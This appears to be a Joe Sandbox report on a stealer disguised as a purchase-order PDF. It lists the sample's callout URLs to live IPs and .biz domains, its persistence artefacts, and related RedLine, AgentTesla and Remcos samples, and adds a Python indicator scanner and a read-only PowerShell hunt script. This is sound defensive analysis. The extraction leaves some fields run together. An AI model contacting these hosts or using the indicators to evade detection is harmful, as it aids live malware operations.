                                                                                                                                                                                                                                                      http://18.208.156.248/sgbnffiuqoo%alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2641781426.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2690389382.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2718655052.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2726765067.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2651055218.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2665977163.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725466664.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2709340960.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2682321054.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://tempuri.org/Entity/Id5Responsebuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://tempuri.org/Entity/Id15ResponseDbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            http://tempuri.org/Entity/Id10Responsebuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://tempuri.org/Entity/Id8Responsebuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  http://18.208.156.248/wcffwbepjknhrkkdalg.exe, 00000009.00000003.3050069889.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3047643251.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3079434309.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3030359798.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3058249726.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3078569820.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3061259113.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3031391633.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentitybuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      http://34.211.97.45:80/csepohryabqocrsdPLcCalg.exe, 00000009.00000003.3230534446.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        http://18.141.10.107:80/iaiodpshpbalg.exe, 00000009.00000003.3191422112.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/Noncebuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                http://172.234.222.143:80/wwalg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2229224734.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2211690726.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2465112671.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2228386739.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2444067771.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2210828989.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                  http://tempuri.org/Entity/Id13Responsebuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://3.254.94.185:80/npjswmwoxwkrbxd | alg.exe, 00000009.00000003.2963959260.000000000056E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1 | build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1 | build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty | build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://208.100.26.245:80/jaegql | alg.exe, 00000009.00000003.2690389382.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2651055218.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2665977163.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2682321054.000000000056E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://44.221.84.105:80/wrjeoyp | alg.exe, 00000009.00000002.3323934646.000000000056E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://208.100.26.245:80/xnxlkgkrmwlxblktP | alg.exe, 00000009.00000003.2768613145.000000000056E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://34.246.200.160:80/qqxxgql | alg.exe, 00000009.00000003.2641781426.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2634085222.000000000056E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement | build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id4ResponseD | build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://18.208.156.248:80/mvljrpb | alg.exe, 00000009.00000003.3306777601.000000000056E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap | build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://172.234.222.143:80/kadnnjikurdd | alg.exe, 00000009.00000003.2621710164.000000000056E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
165.160.15.20 | myups.biz | United States | 19574 | CSCUS | false
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
3.254.94.185 | uaafd.biz | United States | 16509 | AMAZON-02US | true
3.94.10.34 | ytctnunms.biz | United States | 14618 | AMAZON-AESUS | true
34.246.200.160 | tbjrpv.biz | United States | 16509 | AMAZON-02US | true
172.234.222.143 | przvgke.biz | United States | 20940 | AKAMAI-ASN1EU | false
18.208.156.248 | damcprvgv.biz | United States | 14618 | AMAZON-AESUS | true
34.211.97.45 | vrrazpdh.biz | United States | 16509 | AMAZON-02US | true
208.100.26.245 | gytujflc.biz | United States | 32748 | STEADFASTUS | false
35.164.78.200 | nqwjmb.biz | United States | 16509 | AMAZON-02US | true
172.234.222.138 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
165.160.13.20 | unknown | United States | 19574 | CSCUS | false
51.195.88.199 | s82.gocheapweb.com | France | 16276 | OVHFR | false
212.162.149.53 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | true
44.213.104.86 | vyome.biz | United States | 14618 | AMAZON-AESUS | true
44.221.84.105 | hehckyov.biz | United States | 14618 | AMAZON-AESUS | true
85.214.228.140 | dlynankz.biz | Germany | 6724 | STRATOSTRATOAGDE | false
54.244.188.177 | pywolwnvd.biz | United States | 16509 | AMAZON-02US | true
13.251.16.150 | sxmiywsfv.biz | United States | 16509 | AMAZON-02US | true
47.129.31.212 | xlfhhhm.biz | Canada | 34533 | ESAMARA-ASRU | true
82.112.184.197 | vjaxhpbji.biz | Russian Federation | 43267 | FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU | false
18.141.10.107 | warkcdu.biz | United States | 16509 | AMAZON-02US | true
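The IP rows above, as the extracted page presents them, come out flattened to three lines per record (IP, then domain run into the country, then ASN run into the ASN name and the malicious flag), and the alg.exe download URLs share one shape: a bare IPv4 on port 80 with a single random alphabetic path segment. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample. It rebuilds structured records from a constructed subset of those flattened rows and runs them, plus a heuristic for that URL shape, over constructed proxy log lines. The `COUNTRIES` list, the space-separated `timestamp client method url status` log layout, the `RANDOM_PATH_URL` pattern and the log lines themselves are assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed subset of the report's IP table, kept in the flattened
# three-lines-per-record shape the extracted page shows:
#   <ip> / <domain><country> / <asn><asn name><true|false>
RAW_IP_ROWS = """\
165.160.15.20
myups.bizUnited States
19574CSCUSfalse
104.26.12.205
api.ipify.orgUnited States
13335CLOUDFLARENETUSfalse
3.254.94.185
uaafd.bizUnited States
16509AMAZON-02UStrue
212.162.149.53
unknownNetherlands
64236UNREAL-SERVERSUStrue
82.112.184.197
vjaxhpbji.bizRussian Federation
43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
"""

# Assumption: every country name that can appear as the suffix of the domain
# line. The parser refuses a row it cannot split rather than guessing.
COUNTRIES = ("United States", "France", "Netherlands", "Germany", "Canada",
             "Russian Federation")

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
ASN_LINE = re.compile(r"^(\d+)(.*?)(true|false)$")
# Heuristic (an assumption, not a report signature): the download URLs the report
# recovered from alg.exe memory are http://<ipv4>:80/<one random alphabetic segment>.
RANDOM_PATH_URL = re.compile(r"^http://\d{1,3}(?:\.\d{1,3}){3}:80/[A-Za-z]{5,24}$")


@dataclass(frozen=True)
class IpRecord:
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str
    malicious: bool


def parse_ip_rows(raw: str) -> List[IpRecord]:
    """Rebuild structured records from the flattened three-line rows."""
    lines = [ln.strip() for ln in raw.splitlines() if ln.strip()]
    if len(lines) % 3:
        raise ValueError("expected three lines per record")
    records = []
    for i in range(0, len(lines), 3):
        ip, dom_country, asn_line = lines[i:i + 3]
        if not IPV4.match(ip):
            raise ValueError(f"bad IP line: {ip!r}")
        country = next((c for c in COUNTRIES if dom_country.endswith(c)), None)
        if country is None:
            raise ValueError(f"unknown country suffix in {dom_country!r}")
        m = ASN_LINE.match(asn_line)
        if not m:
            raise ValueError(f"bad ASN line: {asn_line!r}")
        records.append(IpRecord(ip, dom_country[:-len(country)], country,
                                int(m.group(1)), m.group(2), m.group(3) == "true"))
    return records


def host_of(url: str) -> str:
    """Host part of a URL, without scheme, port or path."""
    return re.sub(r"^https?://", "", url).split("/", 1)[0].split(":", 1)[0]


def scan_proxy_log(log_lines: List[str], records: List[IpRecord]) -> List[Tuple[int, str, str]]:
    """Return (line number, host, reason) for every line whose host is in the
    report table, or whose URL has the bare-IP random-path download shape."""
    by_host = {r.ip: r for r in records}
    by_host.update({r.domain: r for r in records if r.domain != "unknown"})
    hits = []
    for n, line in enumerate(log_lines, 1):
        parts = line.split()
        if len(parts) < 4:
            continue  # not in the assumed "timestamp client method url status" layout
        url = parts[3]
        host = host_of(url)
        rec = by_host.get(host)
        if rec is not None:
            hits.append((n, host, f"in report table, malicious={rec.malicious}"))
        elif RANDOM_PATH_URL.match(url):
            hits.append((n, host, "bare-IP random-path download shape"))
    return hits


# Constructed proxy log lines (assumed layout: timestamp client method url status).
SAMPLE_PROXY_LOG = [
    "2024-10-10T08:07:01Z 10.0.0.15 GET http://3.254.94.185:80/npjswmwoxwkrbxd 200",
    "2024-10-10T08:07:03Z 10.0.0.15 GET http://api.ipify.org/ 200",
    "2024-10-10T08:07:09Z 10.0.0.15 GET http://vjaxhpbji.biz/ 404",
    "2024-10-10T08:08:10Z 10.0.0.22 GET http://198.51.100.7:80/qzfhtrkbl 200",
    "2024-10-10T08:08:11Z 10.0.0.22 GET https://example.com/index.html 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG, parse_ip_rows(RAW_IP_ROWS)):
        print(hit)
```

The table hit on api.ipify.org is reported with `malicious=False`, which is why the reason carries the report's own flag rather than a verdict: a public IP lookup is not an indicator by itself, but next to a download from one of the flagged IPs it is worth seeing in the same output. The random-path heuristic fires on hosts the report never listed, which is what you want from it, and it should be tuned against your own proxy baseline before being turned into an alert.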
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1530636
Start date and time: 2024-10-10 10:06:22 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 42
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@49/171@148/22
EGA Information:
• Successful, ratio: 55.6%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, VSSVC.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Native_Redline_BTC.exe, PID 6180 because it is empty
• Execution Graph export aborted for target microsofts.exe, PID 576 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 5880 because it is empty
• Execution Graph export aborted for target server_BTC.exe, PID 1272 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
Time | Type | Description
04:07:25 | API Interceptor | 85x Sleep call for process: alg.exe modified
04:07:25 | API Interceptor | 19x Sleep call for process: powershell.exe modified
04:07:26 | API Interceptor | 1029918x Sleep call for process: microsofts.exe modified
04:07:27 | API Interceptor | 397213x Sleep call for process: TrojanAIbot.exe modified
04:07:46 | API Interceptor | 103x Sleep call for process: build.exe modified
04:08:10 | API Interceptor | 199x Sleep call for process: msdtc.exe modified
10:07:26 | Task Scheduler | Run new task: AccSys, path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
10:07:27 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

The API Interceptor counts are Sleep calls the sandbox intercepted and shortened per process; counts in the hundreds of thousands to a million (microsofts.exe, TrojanAIbot.exe) mean those processes sat in tight sleep loops that the sandbox had to patch out to make progress. The last two rows are the persistence the sample set up: a scheduled task named AccSys and a Startup-folder shortcut, both pointing at TrojanAIbot.exe dropped under %APPDATA%\ACCApi.
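The two persistence entries above are the cheapest host-side artefacts to hunt for. The script below is an added triage check written for this page; it is not part of the Joe Sandbox report and not code from the sample. It assumes the standard profile layout (C:\Users\<name>\AppData\Roaming) and that an infected host carries the same task name, shortcut name and drop path the report recorded. It is read-only and should be run from an elevated prompt so that other users' scheduled tasks and profiles are visible.

```powershell
# Added triage check (not from the Joe Sandbox report or the sample): look for
# the persistence artefacts recorded in the report's timeline, namely the
# scheduled task "AccSys" and a Startup-folder .lnk, both pointing at
# TrojanAIbot.exe under %APPDATA%\ACCApi.
$ErrorActionPreference = 'SilentlyContinue'
$findings = @()

# 1. Scheduled tasks: match on the task name from the report, or on any task
#    whose action executes the dropped binary, in case the name was changed.
$tasks = Get-ScheduledTask | Where-Object {
    $_.TaskName -eq 'AccSys' -or
    ($_.Actions | Where-Object { $_.Execute -match 'ACCApi\\TrojanAIbot\.exe' })
}
foreach ($t in $tasks) {
    foreach ($a in $t.Actions) {
        $findings += [pscustomobject]@{
            Type   = 'ScheduledTask'
            Name   = "$($t.TaskPath)$($t.TaskName)"
            Target = "$($a.Execute) $($a.Arguments)".Trim()
        }
    }
}

# 2. Startup-folder shortcuts: resolve every .lnk and check its target, across
#    all profiles rather than only the "user" account the sandbox ran as.
$shell    = New-Object -ComObject WScript.Shell
$profiles = Get-ChildItem 'C:\Users' -Directory
foreach ($p in $profiles) {
    $startup = Join-Path $p.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
    Get-ChildItem $startup -Filter *.lnk | ForEach-Object {
        $target = $shell.CreateShortcut($_.FullName).TargetPath
        if ($_.Name -eq 'TrojanAIbot.exe.lnk' -or $target -match 'ACCApi\\TrojanAIbot\.exe') {
            $findings += [pscustomobject]@{ Type = 'StartupLnk'; Name = $_.FullName; Target = $target }
        }
    }

    # 3. The dropped binary itself; record its SHA-256 so it can be compared
    #    against the hashes listed elsewhere in the report.
    $exe = Join-Path $p.FullName 'AppData\Roaming\ACCApi\TrojanAIbot.exe'
    if (Test-Path $exe) {
        $findings += [pscustomobject]@{
            Type   = 'DroppedFile'
            Name   = $exe
            Target = (Get-FileHash $exe -Algorithm SHA256).Hash
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize }
else { 'No AccSys / TrojanAIbot persistence artefacts found.' }
```

Matching on the action path as well as the task name matters because the task name is the easiest thing for a later build to change, while the drop directory tends to survive across variants. A hit in any of the three categories is enough to isolate the host; absence of all three does not clear it, since the report also lists other dropped executables (Native_Redline_BTC.exe, server_BTC.exe, microsofts.exe) whose locations this check does not cover.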
Match | Associated Sample Name / URL | Detection | Threat Name | Context

165.160.15.20
nL0Vxav3OB.exe | malicious | Remcos | myups.biz/eqcq
tyRPPK48Mk.exe | malicious | Remcos | myups.biz/lihflvfpneg
RFQ_PO_KMM7983972_ORDER_DETAILS.js | malicious | AgentTesla, RedLine | myups.biz/iyyrahcc
KY9D34Qh8d.exe | malicious | Unknown | dxglobal.co.kr/
XZw2GNATrR.exe | malicious | FormBook, GuLoader | www.triciaaprimrosevp.com/xchu/?l8=4hfd&2dvlmF=FfQWrZf65Vop6YG1TmouR8u1gr6XUpPNH67i+hNxH0jghlNI2qurbIC5tjwZKbPxMdLE
ZparFzqF3A.exe | malicious | FormBook, GuLoader | www.triciaaprimrosevp.com/xchu/?UDHLeHNP=FfQWrZf65Vop6YG1TmouR8u1gr6XUpPNH67i+hNxH0jghlNI2qurbIC5tjwZKbPxMdLE&Kzr=5jUtFh
0IwziVq2Dr.exe | malicious | FormBook, GuLoader | www.triciaaprimrosevp.com/xchu/?k8q=FfQWrZf65Vop6YG1TmouR8u1gr6XUpPNH67i+hNxH0jghlNI2qurbIC5tjwZKbPxMdLE&1b_HC=lVfXh
Order-688930021178.exe | malicious | BluStealer, ThunderFox Stealer, a310Logger | myups.biz/unwcftfsuwsxhv
Purchase_Order.exe | malicious | DarkCloud | myups.biz/beabpctid
Purchase_Order_202319876.exe | malicious | BluStealer, ThunderFox Stealer, a310Logger | myups.biz/edqptrd

104.26.12.205
SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
hloRQZmlfg.exe | malicious | RDPWrap Tool | api.ipify.org/
file.exe | malicious | RDPWrap Tool | api.ipify.org/
file.exe | malicious | Unknown | api.ipify.org/
file.exe | malicious | Unknown | api.ipify.org/
file.exe | malicious | Unknown | api.ipify.org/
file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
Prismifyr-Install.exe | malicious | Node Stealer | (context not shown)

The 165.160.15.20 matches are a useful pivot: a different family on each sample but the same IP behind myups.biz, dxglobal.co.kr and triciaaprimrosevp.com, which points at shared hosting used by several commodity-malware campaigns. The 104.26.12.205 matches are not: every one shares the context api.ipify.org/, a public external-IP lookup service that many unrelated stealers query, so those samples are related to this one only through a benign third-party service, not through attacker infrastructure.
                                                                                                                                                                                                                                                                                                          • api.ipify.org/
                                                                                                                                                                                                                                                                                                          2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • api.ipify.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
vjaxhpbji.biz | nL0Vxav3OB.exe | malicious | Remcos | 82.112.184.197
vjaxhpbji.biz | tyRPPK48Mk.exe | malicious | Remcos | 82.112.184.197
vjaxhpbji.biz | RFQ_PO_KMM7983972_ORDER_DETAILS.js | malicious | AgentTesla, RedLine | 82.112.184.197
vjaxhpbji.biz | TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | malicious | FormBook | 82.112.184.197
vjaxhpbji.biz | NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE | malicious | AgentTesla, RedLine | 82.112.184.197
vjaxhpbji.biz | TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | malicious | FormBook, LummaC Stealer | 82.112.184.197
vjaxhpbji.biz | Payment Advice - Advice RefGLV626201911]Priority payment Customer_PDF_.exe | malicious | FormBook | 82.112.184.197
vjaxhpbji.biz | Bank Form.scr.exe | malicious | DarkTortilla, FormBook | 82.112.184.197
s82.gocheapweb.com | RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | malicious | AgentTesla, RedLine | 51.195.88.199
s82.gocheapweb.com | ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader | 51.195.88.199
s82.gocheapweb.com | RFQ_PO_KMM7983972_ORDER_DETAILS.js | malicious | AgentTesla, RedLine | 51.195.88.199
s82.gocheapweb.com | ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader | 51.195.88.199
s82.gocheapweb.com | NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE | malicious | AgentTesla, RedLine | 51.195.88.199
s82.gocheapweb.com | Order SMG 201906 20190816orderGMD#0498366Deta.exe | malicious | AgentTesla, RedLine | 51.195.88.199
s82.gocheapweb.com | RFQPO3D93876738.scr.exe | malicious | AgentTesla, RedLine, XWorm | 51.195.88.199
s82.gocheapweb.com | ORDERDATASHEET#PO8738763.scr.exe | malicious | AgentTesla, RedLine, SugarDump, XWorm | 51.195.88.199
s82.gocheapweb.com | Request for Quotation.js | malicious | AgentTesla | 51.195.88.199
s82.gocheapweb.com | Revised_June_Order_Document#po839203.js | malicious | AgentTesla, SugarDump, XWorm | 51.195.88.199
pywolwnvd.biz | nL0Vxav3OB.exe | malicious | Remcos | 54.244.188.177
pywolwnvd.biz | tyRPPK48Mk.exe | malicious | Remcos | 54.244.188.177
pywolwnvd.biz | RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | malicious | AgentTesla, RedLine | 54.244.188.177
pywolwnvd.biz | ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader | 54.244.188.177
pywolwnvd.biz | RFQ_PO_KMM7983972_ORDER_DETAILS.js | malicious | AgentTesla, RedLine | 54.244.188.177
pywolwnvd.biz | ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader | 54.244.188.177
pywolwnvd.biz | TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE | malicious | AgentTesla, RedLine | 54.244.188.177
pywolwnvd.biz | TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | malicious | FormBook, LummaC Stealer | 54.244.188.177
pywolwnvd.biz | Original Shipment Document_PDF_.exe | malicious | FormBook | 54.244.188.177
uaafd.biz | nL0Vxav3OB.exe | malicious | Remcos | 3.254.94.185
uaafd.biz | tyRPPK48Mk.exe | malicious | Remcos | 3.254.94.185
uaafd.biz | TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | malicious | FormBook | 3.254.94.185
uaafd.biz | NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE | malicious | AgentTesla, RedLine | 3.254.94.185
uaafd.biz | TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | malicious | FormBook, LummaC Stealer | 3.254.94.185
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | http://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | Documents.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | PAYMENT ADVISE#9879058.exe | malicious | FormBook | 104.21.11.31
CLOUDFLARENETUS | 10092024150836 09.10.2024.vbe | malicious | FormBook | 188.114.96.3
CLOUDFLARENETUS | https://w7950.app.blinkops.com | malicious | Unknown | 104.26.2.186
CLOUDFLARENETUS | Hesap-hareketleriniz.exe | malicious | FormBook | 188.114.96.3
CLOUDFLARENETUS | Inquiry N TM24-10-09.xlam.xlsx | malicious | AgentTesla | 104.21.53.112
CLOUDFLARENETUS | hlyG1m5UmO.exe | malicious | Stealc, Vidar | 104.21.56.70
CLOUDFLARENETUS | Salary Increase Letter_Oct 2024.vbs | malicious | Remcos, GuLoader | 104.21.2.6
CLOUDFLARENETUS | #U8a62#U50f9 (RFQ) -RFQ20241010.vbs | malicious | GuLoader, Snake Keylogger | 188.114.97.3
AMAZON-AESUS | https://w7950.app.blinkops.com | malicious | Unknown |
                                                                                                                                                                                                                                                                                                          • 52.7.22.181
                                                                                                                                                                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                          • 18.211.129.165
                                                                                                                                                                                                                                                                                                          Documentosrs.ppamGet hashmaliciousRevengeRATBrowse
                                                                                                                                                                                                                                                                                                          • 54.146.241.16
                                                                                                                                                                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                          • 54.134.19.170
                                                                                                                                                                                                                                                                                                          https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 34.224.177.146
                                                                                                                                                                                                                                                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 3.232.129.100
                                                                                                                                                                                                                                                                                                          na.elfGet hashmaliciousUnknownBrowse
